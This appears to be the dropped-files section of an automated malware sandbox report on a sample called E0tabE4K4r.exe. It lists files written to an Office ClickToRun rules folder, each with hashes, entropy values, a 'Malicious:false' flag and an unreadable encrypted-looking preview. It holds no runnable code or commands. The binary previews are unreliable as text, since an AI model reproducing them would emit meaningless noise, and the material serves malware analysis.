                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.897085746407552
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:rQNfJv1jpyX09gYQi0QQ8PkcAWDvdi3ln4xOjlzrD:UNR9fprmVWDvdQNcGBH
                                                                                                                                                  MD5:1E8207601B6484354C88E3F9C8B59EB0
                                                                                                                                                  SHA1:FE35E57BC7245B24A485A472950A6306103AE32D
                                                                                                                                                  SHA-256:09C8F633896525C6CE724CD0504114DFF0F894812BC5A64C0539E8D37915975C
                                                                                                                                                  SHA-512:1A3EC210EA3A311FC2ACFC69CE8B8C27728B34040E89527A3746B0E810A5478323E05D60902013D47FE720654930E59332F6FC63709AAFAB1D57DF6A579BE311
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.^4..!..G..oz!bA.w.......r.6<V..$.U( ...N....U....B........V..s..EL.U.2..m..(..!.[.......?...^..m.....F...S.l.|.<..S.mw.}.E)...C.Q.....;..;+w....+..a.b.'.....0+...'Cs.%....x....O..rM.|A.4....=.v$JW$.(.C@...T+....e.*.......58&...'..s..<.2'......d..d...\p..P..W..t.|}...nE...f..{..I..I....`..s.....F.......N>..........5\.J.~.R..*.r1".x.H..01..O1af....w...B)RP....3..lu.`.|......;..Pb.*%`.. ..z;Nh...-...4In...hn.2._MJ.b..sX.=.Wb.g...4....W&.n..i.#S.....S...,.7.#r.>......:.7..W..zP...$.v.g.:.N.e.%...c..S..372.W..IeMv._......q...$h^...L.#.t.C11b.._.M-..+.."Oz...kl.<..t......0.Nmi.....y.UJ.s.A......Hb.&./1...|.......OasL........7......=<.z.....3.YV).".!.l._.#.p.#...i.59...v.../..s.g.....7.$].U..G..k.Q..I(.&..:..|...'...*....(.R1....I....D.U.......~.r..k.X..c.w......{Z<.F...).Y.......Z.E.g.x::*G...3t35...x.x.D.O.Y.*}5..J/...T.j...`y.h....dS...b8.....3.k.]"...+.w..|..E..p.B.d..E..T.J."....I@....{..D......."...'!....?.E.${..3`..E6..PlWj

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1711
                                                                                                                                                  Entropy (8bit):7.892717256994813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:NQ09Xvn2g8xmlfk7HndLgw+lemqI+ElbmB269KbD:NQif2g8UlE90w+lelIllaiX
                                                                                                                                                  MD5:2746E613298F5727E653092F724110A4
                                                                                                                                                  SHA1:48B13C6F7260917046FE3FF2A7D17ABD12FF0138
                                                                                                                                                  SHA-256:5950090ED93667E0E4E878822CC35887178F579EE443D6518EF4E8761FC5E102
                                                                                                                                                  SHA-512:D8D1E6233B729710DE3906B085F67CF27333D2128C51CC34206F7A960ED8E67249C4B93C5A6D138CC7B57E4149979A79C0733E49A010772F0B975DD63428FEF0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml63n...D+*pqX...$+S:G.<....Ou.?...MPg.4..:.H_..../.H.G.E$.C~.]."~C..I..h.@r..r.F..."*F....@P.[.S.[/.....j...cr.b];5...f=.T.j..1.3.....$.cX.<..Yh.:..B.......j'2U.....0./.I....:...].6.O..,r.G.6._.._.+....j..z..9..i..x/h...[(1. v":.o.Z..|..U..K..\..0.~.].`|6A...W?.`y.\.pQ.e..N.U..,#...Sr.b.Z.).....#..o&v+.).#...v........u.?...s...D...k..b...l..;...@.~.....S.8k.A!R9..[...lT..dR|k.j8...r V..B....E.:.{$...=.0......1.8d......s..f.t...80.{..g.sq#b....U....f.HM)&H^.N%.-..,.9E.E...._...E>......}.......^.s..ohL......N.......K.~m[..0.j\]......d..n.G..f.....t_......r...S..P......#.3.."#...i(<w.~.ufY....).w-.CE/(..d......-;{a....!,59..K\..1}JU.|.....MU..'...z..gu,........+..9k7G\x....IL#..B..`..&}..;~@-t...[i~.....&...ARh...1.7......S..R!..8l.9...1F.'.c?.Z...SA...S......x.Vr.bw&T#..\P...S.....Ug.....;..Z.......^.,......s..&.1.ca....$^EA..=|.J.]..d}.}.}..\.D.<..tz..|...SbD.."s.-.......k.*..%K.T $.+...........9..f..3C..H.1)..i.>..A...hH..Q

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1748
                                                                                                                                                  Entropy (8bit):7.882492014221307
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:F2gavj+/w3eGPtVq3/7B4y0M+ZZ9tRZxRD:F2Hj+/ws3jBL0MCVxZ
                                                                                                                                                  MD5:DA38065797EA4783B7F4E74FFA24FEC2
                                                                                                                                                  SHA1:05BA91AEB7981A0FB20B972ED4A85D5B8E863CA2
                                                                                                                                                  SHA-256:9DDCE8D7D30EE73CDD8FDC5BD7466A97954337EDE11B24677510FDAABB472451
                                                                                                                                                  SHA-512:DAAE974ED786332C84910C3EE1B3CE8414E0BD850E110EF3AD6BA472E72A829EA2B767E2078AA30659ADCA278A9A4B80D74E5DCB209F69BF4B2411442CF47930
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml._.%.9....Q...&(e.s.Y...#.G.......|@-G.8q.k........[.Nt..?....P.Y....S.b.'...=.??.@3..I}..7..7.CN.D.L.8s.N##'s.,..(.!.7".......P.NI.=.......y.V..!...~.....t...y.6....S.........H..2.Z!.G...S.K.i.......=j......N.@lW...)?.!.G0.9..:.Q...4).E._.hV.}b8[.."].5.fMCo=.....@A..#.C.v\.,V+.k[...V2.-._-..c....1[.p...dU.J...r.~.."..`.zX...:...[.@=P...r..8...Q..9$.M..J......5..M.]:...<.<..`..JJ;r.#.6O,a.o.N.,.....w.t(...l.&7.[.C.4=a. ...Sw....?..8J..p4X..5...,.u74.......%:v.|..h..V.b;..H..;.@V.Z.`a....]....j<c...u.XtI*L.!.E....&.i............M.wfz."..e...........R...N.4..g..."'....D...D.Q....j.G.6...B..8u....H(N.H.*IN..M.v.b...n..G`......N+.....PVcm...8. .....DU,.....;*..j.........~_.c.R.M.8...t...;.E..t.;$.F*.gH..%_..?8...q.....".|.M... s:?De.L......7_....T[.....|.@E.../?...}4U$+.:..1...2y.v.....*."Q.@Y..=z..O.....!.$..k.t...5..P^R..5.!...bh.E.x...Bg.Gd..."...">..q.S^Id.)..O.....XGE......ft......T...maX&...4..A.u".-.;....s?.K.0"..9...h..t..5.B.u.%.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1733
                                                                                                                                                  Entropy (8bit):7.902957305032454
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:oxxOfTeLNcCgyNfAfmvz6GDD7kCorJ3wddsD:oYe5Nft/D0BB
                                                                                                                                                  MD5:2564564261C4EF230696DC4D904D7720
                                                                                                                                                  SHA1:15B3670A08CA2E3858B87B3CB1DB888D22B834B9
                                                                                                                                                  SHA-256:B61D21092E271E7670B0E7FC0ADB8B3A149335C71ED43FA6BF86EA5609F9A6B4
                                                                                                                                                  SHA-512:892073EA09C443F58080EA9B46623FBCEF4DFFEA878458E0EF433CE5AEF54A05321510246C66B5FAB9452AA048D8BC075926E1C2786BEF5FA81A8BFF47BDFACF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.5.5.*.k......l(.|...%U..*3#..ORu.K..eA.X.1#...lY..}.I.:.J.DN...whA...Nd.f3...w..)...N o...|.....j"......F..b..Hi..J...E..4m%3x@.l?HU[_.+...S...3Dqk"'KQ.J...kh\;...+.N7..V..i....J<g'.......e.5...M..A.l`...4N.."..5E;.=......@...$...%$I......==.=...._...A....y....s2.,,-z=|.....o..<..u...!|...Vw..zKo{......Io.D..n.]....m.M...<a.1H..v..4n...w......i.l...N6\....M..#z.4..B.2.C}..be4!...".L..S*.....Qn............L...>.......A.....X...!.n.;..:kY......;N.%.?\....y..%s.K3.q....$....|h...$1e^.........(.e.B.....y........,...B...Y..SY.....3."#o..:w|+p2...../]4.{..f.&ra.#.(3l..o.Vc........i...Ga.?.Q....#..%..'..O#rl....B...4...|<L?Q.c-.../Y...uI.J..#...W~.B.m....y.I.iZz..j;...up.:?H.\.K.0#6.._u.mT^...q2N-.B.:LH..x ...b$...Ntk....2..d..]..G...F.|.....N2.eP..C....GG.9..,....h...Ek..1..|$%..L~..$........AAN.._9mu..QF+..Uv... .}...V.]..@....)X#......v.UH......Y.s.F..j..`.....NE......y..B.>.,.6mY.AX".p...TC.Tv[...1d.9.-I(.h...|...<.>...:.....&..;YZ.e..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1770
                                                                                                                                                  Entropy (8bit):7.895714521159582
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Eu+vJbvvPdrXfnMPFEoz2fxvjHsGHS5waUph18kUq0qAq1ULb2v5Z0ViAVeyE/+w:EuQJZnMEoC5rHsGBZDM+Aq1aMTVAV/UD
                                                                                                                                                  MD5:480B8B874DD710FE1C9506FD840A03EC
                                                                                                                                                  SHA1:ABA2A2580ABFD59FAEA6D9979D35B7EB8D31B00C
                                                                                                                                                  SHA-256:90CADBF0DAA3BD9525A927EC6A82F59C0665F1D4500B08B2BE9E056EF90FC603
                                                                                                                                                  SHA-512:0C41600D05DFAA0E40597B497DBD45364A269C71D4C4C23523B647ED73ABC4C97E370E444759D53E09EB9C35B961433387262D77428FC52FB6222BABBFD64C46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlXa...$.?.m..4.`....tK....=.B.4X..~....x..M]l.........L..C..7..x1'.....1.,..P.^..v(.J..KH3...+..( ~....b..}..%.j.3.p!..e.X..H.h4..`.[(.."Y'&...j.......7R'K.......Nr.U..1.......o.v_...g.4A4./<.U......S...J...xM.u....5..>..Kq.k...u..._..=.........Lh........'...g8.YM....5..:'.%UqE.........%.N.i..L.T......v...D.~.J.d......xj&.@.]|*.)TNa.L...Y...].TB@.(....m..('.)"%.....lyL.YS#.nL/.c........3l..w#.=..j.....8.|..+".....C#...@..f.o!H.k.u}..$s.,...j.nM..Tn...ll....=...5.v...>....v.....b....sxd.u...R.+a.L......]...e...y._,n80....3~@..U*9Kw~..[~0..."d31...6.c...R..H.:....B...W.\..G....`{.%....S/..n......a...K..M..GP(.nO.2....d..H..*.u....`..!Q..,...........k..!a./.Am...~%.../..'....;6.jd|._3......./&.f.q.F.1w4.1a.............6z..v.....5....$....f....h.....$...T....dY.J...I......[...3.|...Hn.Y..PXYnU7.z.G..#Yz/..z.<g)..m...Z.....J.~..~....[;9....^..^...?.Z!....#.#c.0...[.|8.g......1...h.._.y.R...._'".3B..{..<.>..5.-T...M..oJ.NR..]...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1715
                                                                                                                                                  Entropy (8bit):7.881992933969602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9qPVKPM+tejyr10QQgZTo2CiJ1v7oxU8HZuzD:9EdjEpQhJGv7b8HZ6
                                                                                                                                                  MD5:2AD80FE9AE82BFBB5FEF8251FD22EFB1
                                                                                                                                                  SHA1:F696A8799FB54D5B8BEDD259778AA1CD8E71A84F
                                                                                                                                                  SHA-256:3A8F8AEE5ABF5F86F09EAF4C7E93E8920F42A5984A942DD9763D15ABF4B79CF0
                                                                                                                                                  SHA-512:7E115008F495AF153BC05758966932848C003265ECDA66B24A421B20864973408B438FD6C5538A168AC2E5DE085A7B2220C65859F2B83D4AB175C6CE6EC85C88
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..#.1.#...F%..K.N.G?W^^..C~....u.....sHUE...m.>9..t..O......X<q.yp.xQ. .}..=.w.0.......y......z.]..7.d.5.+T...G.A]F...Rh .....2......S....H.Y<.(.7.^.....f7..pND...F...`...0G<.'o+..0....R.Q(._... </~....HzD.....1.....^7..UX.....y....i.gV.........0..[......F....."..Cy.lRG.l....a.c.QZ=..u...6...vb....<.5.gxV..5..A...|6....q..a....@_3.....GMe. ..L..J.....=Y`..a. ...\.....dz....i.......fY.N...3.....I.r....3.QU...nj_.&q3.:n..4..........p..$.*..O.1..L....v .]".f..k..h.e..ex/..=......X....i.7.a_]f..I.W%...&|...kA)m[...k....4....Gd.b"...9X..ev]...\..q//........p..Qd....1...!.V..q....t.)..0.W..z.v.4...m<.59[..@|.I.q.e..!D..)..h...6.....o...?.+.w1.lJ...Wz......S..).,...S%..Es0=.......+..E..-^...G9.BZ.\.. R.p...R.c.w.HHP.....A..[=.pM...y.......4........d9z..A.2.|.UM.Mv....P01?R...X'n...u....(.H.@:;..(x.<O.)..Hg.j..1..0..@..2....6...VcY..G3lp...B....'.$......6...($.2..e(m...%.n5...HM1).^,.'..8..........h..|...Z....`....7_Ur`Ea..b...PP

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1752
                                                                                                                                                  Entropy (8bit):7.897453077759731
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gGVoM/ij2QhT8nzOZ6LmVUM9EHh8T1HLnYCU9qBD:Fx/ij2uVZ66uDHh8T1jYCU9qp
                                                                                                                                                  MD5:DD8D91A933CB52CE24CE2BCC4AB6F297
                                                                                                                                                  SHA1:3DBB1C15EA5BCDB3A952125D3D05E539F9990AA9
                                                                                                                                                  SHA-256:428A5984F251436594F38F05058EA982125F979AA2A2DD7B48B40FE2343DA9B9
                                                                                                                                                  SHA-512:5C3E4025B36BD5DB685B3D3A48BB076158E6A31D2E4CF56B21CB085B406DFA91F2D1C374BE4849C5FE66589435F91B5B340876E6AA5E08A792E76326F7DB1AE9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..P..e ..p....P....M....N...M..m_..........8..p..e..<..4.@.(...db....)...#A....8p.'G.C.T;...H4.!..ri.h....".2...#...<.."L.,.f.{L.%...r.I.C!TK...'~.@U..H`......T."..c.g.t.'/.[...Q7.....w.zk../7.....#.9.C.g9......y...7~....0....Vf}...U.J.'qR.}.3.j.MI...4...@H.3..q..$........$.=.\..ZF...S...<..R..Y.}...b..BU...DF..o..h).z...S5C.&.s>].`0...B...0...r...~Q...=4.(.X...+.....^...+qt.,...\8dE/..d....n.K..~i..7.Y]>C1...X..d..[N. -m..I(.X..s.LZ....lku.#..].'t...EoJ.9.*.f.......o.@x%....O......g#F....h.@.....D.._uR-4..........Ql.B_...9.eC/S.Pt./"....x...Y2.;..i.gs.Gf.6..:...J.!..0....'..a.... .R.......v..9..G....gt.@.%x...>*Y...x..%.&t....c%X.S...?....A......d........$..~].....a;..s..j.......T..=..a.mt.h.....Z-..G.,..D..}7.b.......:.@B..'......\.......x,7.jS....lTn.~..6.!....J8.l*.m......s..*.D.#[......u/D.+>..8.-0..h.*|.H.yG.n.....L)\[....^k....s...P/..u..|$..#x..S.{N.....6+.......>... .KZ)..4.x.GT....Sy`-G..q.=<.e....w.N.w.A9bN$......9.1.?Ya.u

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1738
                                                                                                                                                  Entropy (8bit):7.888936342651243
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:+o/snasHrr4aTXGQJRblsFxy3S8hHmXF+C9MtO6eXylD:qvrr4aT2QJRbCFsCM8Fz6e+
                                                                                                                                                  MD5:43480B2AE8852763B9BDFB11ACD69A47
                                                                                                                                                  SHA1:FEA3E77924F35CB95840C1F72FC0EAD1280307F9
                                                                                                                                                  SHA-256:D621C32A99CDA6151F74948BA61DD48E1C10C30B99D0418D391C47F7479A1BA2
                                                                                                                                                  SHA-512:DD39E408CF97ECB6B154545B81F287870113B83CE55D084CE1F01D12D1E3F94500014894A019FB9CA1BDC01F5BDF38C1E00E29B1C6340C6D282C4544844C091E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlw..M1........8.w.R.1..J..(..x..p.+.(P[.S.g..o.....0.....Dr/.g.e...>}.....Y..+..4...Pq8./Un...]...kff...9H...K..vR.N_`.|.....WH.9.uf6.w......@...~.lS'5....Yi)...>..........gy..*...]E...vq.a........}.H...~.s.U3.t...%I/..Zo.j#....B..Gyg.).x..ltN.......I..]...H.3Zq....t.U.%....{...Nm.......*.,.v.....L..z....1.C..X@.....a".p...>!"/k...J...oz...Wl.....G...~.N..*..^\.."i?.@P....A..O.Z....JX...#+-!.m..l..u/.sq..$.u.Lq..41.@......w...........d.xam......<....a Z3.......*........8U... ......r}S.o.......JV.3.....<..j.a....s...}...._..~%@:q.r.">w\...._..e...Q....8...t..{S..y..q..9.......d...u....5....G.U...xw.:.f...hU..p#A...ND......i.n.$E.tv0T..).3@v...0.-|..^.B.W.W.N?..a(.......T.p.3.+...x.P.K......V.4..1.....[.................9..w3,.C.e.H..l...:..3u.q+Q..t...v..W..?k........t.E"..m...Y"....".. .i..N.j.E.U,6...!.XY-t.V/.$w...d..s.\.(n...........A?1....|f...jmB..W...H...r..g.......!..k.q.4C...c#2N....H.m..y.%.4...NcD|.5.$;7}......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1775
                                                                                                                                                  Entropy (8bit):7.887288417857827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gNZLm1GIEKojZoikd0inDS1utTRm+xJNNlToVkD:gD1dKojZochaRdXNl0Vw
                                                                                                                                                  MD5:9B53AF6D34B7EBB00B3DC620F67A6AA7
                                                                                                                                                  SHA1:DD789C9ED9F013EE98E0B8FE5A8644747AA9E95B
                                                                                                                                                  SHA-256:1666F35445D0DA47995E13ED213DCBB32C60B05A7B9EE74FC73DE76496781189
                                                                                                                                                  SHA-512:1F976E42A91793463D14BBDE813B27FB6A23C8EC67FBB02442775242B68B5BBD29D3CC7E7265EE0071BBD9CC46ACF4B4934F7BDF9EA4B0A4C54F3E33172C61F0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml."..c.T.5...)...%\.M7.......C..E./.A.L.-.M..Wad.."....wU..9w.0&..TSy..0.h5...ijK..3...^..T.L?.M........"_.....~".rP^.....N......*.....].M.&_.........*&......../'..I.?...4P.......R.T.n.."...'...4.......J..6M...p..[ ..s.5zK8-#g.,.X..K6.....Y..h..l.i..m..=".aFt.m.."e......7........SJ..8..=C.....fk...E..4s.`B_.^]...w.....'.(K.1(7N.>FIu..sW..O.O.......wtd.919o.O8h....C..X...41/...$.{Zo."T....m@..tP.q....O.BTPB.s..F..... .L.u.c#.+...V..sM..r\....O.[6A./.........._.....\...E|.Dt......:........Gg..\.D.'......0D.?.F.t...mY...[.(.Z<c...$x.`....%..D.$.....M.|.@....b".V....(3...U.gcVo.4.~..<9..3.&....ka5......Lxo.N.eTw.v2.P..g2....M.7W..PN..9..2.c%.... ....Oos.}.?L....\.bB...Aiu...".Q|d..1...%.p}.j.). ..h.@....W......jU......x...t...A.zBP.....MUh5.....5..&...$...@v.n...........E...n$T>.H........b7.k...hI#]..IO..t-.e..W..#.6.s.u...{s.&d.3....n..2..Q}.?....{..6.."p......PZ.....-..+...geP..c.=g].@q.5d..4C..~s.....e...\....,.:(.@/......?....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1723
                                                                                                                                                  Entropy (8bit):7.892612077407383
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Rku1ZVSdjBmGa9IHCt/t1yJ91EmgqaOzE7QBfCMwBD:RkuzUdwGQj1nyJSIHBfjA
                                                                                                                                                  MD5:AE4F6F2DBEEA203C8B9B1D6F6A10794C
                                                                                                                                                  SHA1:48267B85AB8BF009D5D00E4AC2923CD0617C2F5A
                                                                                                                                                  SHA-256:2FEAE9C59DD6CE276DF90B220DAF4559C1DA82433BA57A3225C8A4988F7B2E63
                                                                                                                                                  SHA-512:F77A021E03E5215189C2CB26C59F726C38B199D42175EAAB9E01A9B3C9EDBB89E56CD1C519401792B3FAB2448F48FD46A8C50AD6FE1C264E23E8870C18A2DC45
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....N...?......]...(.hD.......R....RV.s'..[u.,..(;..p..1.Dp..P..?.CEO.O...v.hM..:2k.........=w&Z....@5........Y.Z}.QB.S....gp.....E.....8T..} .M6.J.S.......z.f...'.]..3.t..x..R.]..C... ~4$.^...g~[.^.1N..d..g.3.....dC..}....L.7.s....i.SDc..P..F.......W.!.A...]..)._.:..\.._.....h....l...e..k.d.Z.|W9&..C.....L..>._.q'.|A..Z#<0...E...........Q.w...y...&.qR.n...S.~...e`c..m...L.G.M5..5Z}.uT.q8...,....#sZ......X.|..E&..6...J.]..w{f..f..B+.tz..k&....o..:G.`...i....%t...VLC{7...on...v:.....i~.a.r.^K.............^#b..Ea...$...F..o...b.?pn.*0...<...".s..h.......E..9...Hrm....*,.c..PhW....@.2....3..&.8.@.{"US8t....bg.?...[9........f.m.a.{.)9.....?...;+.....0.....m@...x..UUV.[l.jz....K.j.u..o7.5.'...y....\{.U..8..k...c.@......&U.k.9M...R.S..q3...EO......OG..9.yH..5.K..]GH....mq..a.y..t9.....h.$...{Z-.,.w..4..).yT......O@......t&....Y.... ..Xr.%..R].._...e...2...p.9.U.G..N..y..P.=.O#.O.s....c........-.]...4.......b.%.[O...'D...n......;f.?.T,c..o....Z..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1760
                                                                                                                                                  Entropy (8bit):7.884723458025185
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:aaXgOtYRTVNFnlt7DCbnX6UYUWh1O8VtBpHvIAvFRILD:JwppNFnlteZYD1O87BFRU
                                                                                                                                                  MD5:5C2F26502CF4F84F10AEF621C01F21FE
                                                                                                                                                  SHA1:91FEEF5D4A2232717E3219B668ED41BBE099F4CC
                                                                                                                                                  SHA-256:3F29940FCDB869099B75321C07332D28A26BEC13003FC803C7D653D003A8A301
                                                                                                                                                  SHA-512:A2643635F5588209B0CD0B6CF86E540CA8703BF05B703CF2B0F5B023DD6FC801E264B8715EF98F791046CB139B3ADCE6B4409C5D3FA188EEBF04531CA71F7350
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.]'t..s.hF...P=.h.s.16...q/_C..h....."6|..1.`.;.:.........P=g.A.3._zE..4.sj!.c....0.#o.....c.2i....~...7.gG.X.]q.K@..T.)7.,ipbd..?....O..W......O\r...t......2Dv|..3.'..B..1.E...4..s..,}..uR....s";.....'.....q`....a....o0..O-..#bJ!2CC......EZc.9.P#.T4.....$........8..a.W.]..XD.....m.~...|Bi..t..JT.....\=...,.R0.C+.s.i;k'.IX}.d.!...PQ....e}[OA'...m."...d"........'........E};t7.:'.|.9...y.Q.Zc.7.N....-@.m.....lC.5.wo..Q.. ...h%...t.R.}D.~......4J.....,.>....Bq.%..)%n.T7.....a.<. ..!..P.F.1.....Es"=2.I.8.......}.9.P$y.H.,..L..v;.w&.....S.w.......K,dj.c.>......MiD...>...d..+u.... Lo.:Ik:.^A.&.'...)zd~(.."...z......Q...@$!.....v.D..........cr.R.3........R........{Dy..G-.|..K...A\.S/<..h.{..g...v.Q............r.Bi.b..j8v.....$.T..C.&. ...M..*P.*m..L.']'..+...F./}.ELu.....o.7V...R.^..JnXB...._.^.A3/.k..J..O.B..X.2.aPw..]U.}...@.|lG.$...g.^.y).E.:.. ).q4Y..i.oI*.=.U.9.....v....f.*...-..^.r.H...F0..e....6...cI.s.Q...X15.Y.b.P.. }SN..p...m....L0.x..-

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1699
                                                                                                                                                  Entropy (8bit):7.86890725507785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:YpG/tWJQQOx5xPe1iLt4Vv3Rj3ytaX5bkC1TxXIlAbD:YpEebO3xPecLG5jitaX51XIQ
                                                                                                                                                  MD5:BF905247D0CAFCD4D78A9B3BF363CC88
                                                                                                                                                  SHA1:604F4C8A81988B0E29E50003D86AB1E50B8CDE35
                                                                                                                                                  SHA-256:9690F1C035D5CAE5C21F86546AA3E2169D8F3D13542DA9A826539106D1D23653
                                                                                                                                                  SHA-512:54529348806AD347CC241682224322FB6DAB2815B9D76EA87CDCFA88F74B4BB7DB4888D78A4B0B8DE76677A9049849BBF720D74D1CBC1CF300DFD7D934F532CB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....*.K4=.=n....R.2...-.........9...%.`I.V.\...og.."....q1.F.......GAl.$.B..F..Ez..=...At.0.....{......6;..v...o.k..2SF..%...r....'b......4$......[g..-..T.<....:....9}.f...^.....D.z.j..>..)}...aG...J|.838b..W$tg.<........E.r>jjP..O.....Q.....<.E....$b'./z...L.OS.5..c.Y..w..p.2.a+.......O..%...j..4.!$.77.W.1.....u.l...;.9.-....6G.n7V.CK\.}<....B.<Z.].2.F..^..E..KAHR..N..HQ.....3B...c|..k+."....{.x........EQ$....F.A.Ub.[...c...(_....x..^r<..Rf......u....Y@......yc.r,....}7B...v.4.%r..x..Z8..=#..~...........ho4Qc..o.uZ1&s..;.A.7.B..{xB...z.x....1m...D.R..8....[....qki!....y..=....ET..P\..l.....?.M%...k.....2^zt.0.b7M!6.b..*a@.1.=Q......\..6f..Q^.V..unZ.g5r.....I.....X....f]..7...PW.LE>.A.Q..M.o.X.k...y....9&Tx.......s=.aE5-.:c.JzfD`..BC@QejN.`g....w.*.>.n.....d..>...yOB^^H46.X....~....A....a._...J.$..../.B..v]Q C.N.....Zz^.u.^.,{E>.sB.w....I...G`k.......Cg$V<.....P..Ve...G|u.s7.y....#../.5...g4...T.#..t.:..1.XO[.j...N8..\......^.F.....tA..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1736
                                                                                                                                                  Entropy (8bit):7.892653311385553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:xBa94FPlkFZJe2cHTngOOpGU0KegXpBjFNbD:xBw4FPkZJezngOOreGpBh9
                                                                                                                                                  MD5:86AE51DB0BD618C72054E7E3F8C8FF0B
                                                                                                                                                  SHA1:8168CB543434A82F0A587B53E7056320D04EEC20
                                                                                                                                                  SHA-256:ED69F9E1133EA49C672D33537B54D9519393E09808336F0E8D8C8BACF5F42312
                                                                                                                                                  SHA-512:97D2E765B1F98993267B27354ABAC25FD4E3497FE2AF56F68B59AF1B5B2DEBAA68F3FF6593BABBE20FC38FEA02E6DB02E779747C65C307FFA9F11FC948BF798F
                                                                                                                                                  Malicious:false
